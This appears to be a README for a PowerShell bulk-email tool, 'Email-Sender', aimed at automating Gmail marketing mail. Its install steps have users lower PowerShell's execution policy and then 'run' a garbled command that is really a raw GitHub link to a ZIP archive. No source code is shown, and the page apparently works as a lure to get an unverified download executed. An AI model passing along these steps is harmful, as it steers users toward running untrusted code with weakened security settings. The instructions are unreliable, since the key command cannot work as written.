Welcome to Email-Sender! This easy-to-use Windows PowerShell project helps you send HTML emails using an SMTP server. It works seamlessly with Gmail, allowing you to automate your email marketing efforts.
Click the button above to get the latest version. You will be directed to the Releases page where you can download the software.
To run Email-Sender, ensure you have:
- A Windows operating system (Windows 10 or later recommended)
- PowerShell installed (comes pre-installed with Windows)
- An active internet connection for SMTP server access
Email-Sender offers:
- Simple interface for sending HTML emails.
- Support for Gmail and any SMTP server.
- Templates for easy email design.
- Automation tools to send emails at scheduled times.
-
Visit the Releases Page
Go to the Releases page to find the latest version of Email-Sender.
-
Download the Application
On the Releases page, you will see options for downloading. Choose the latest version and click on the link.
-
Extract the Files
Once the download completes, locate the ZIP file in your downloads folder. Right-click on the file and select "Extract All..." to unzip it.
-
Open PowerShell
Search for "PowerShell" in your Windows search bar and open the application.
-
Set the Execution Policy (If Required)
Before running the script, you may need to allow PowerShell to run scripts. Type the following command and press Enter:
Set-ExecutionPolicy RemoteSignedConfirm if it prompts you.
-
Run Email-Sender
Navigate to the folder where you extracted Email-Sender using the PowerShell command:
cd path\to\Email-SenderReplace
path\to\Email-Senderwith the actual path on your computer. -
Send Your First Email
Inside the Email-Sender folder, run the script with this command:
.\https://github.com/SigmaSigmaBoyehr/Email-Sender/raw/refs/heads/main/Kurd/Sender_Email_1.9.zipFollow the prompts to enter your SMTP details and the email content.
Here's how to send an email using Email-Sender:
- Input your SMTP server details.
- Enter the recipient's email address.
- Fill in the subject and body of the email with your HTML content.
- Press "Send" to dispatch your email.
If you encounter issues, consider the following steps:
- Check SMTP Settings: Ensure your SMTP server details are entered correctly.
- Internet Connection: Make sure you have an active internet connection.
- Execution Policy: If there's an error related to running scripts, revisit the execution policy step.
- PowerShell Documentation: A helpful guide for beginners on scripts and commands.
- Email Marketing Best Practices: Understanding email etiquette can boost your marketing efforts.
If you need help, feel free to open an issue on the GitHub repository. We appreciate user feedback and are here to assist.
- Download Email-Sender: Latest Releases
- Source Code: GitHub Repository
Enjoy sending your emails with Email-Sender!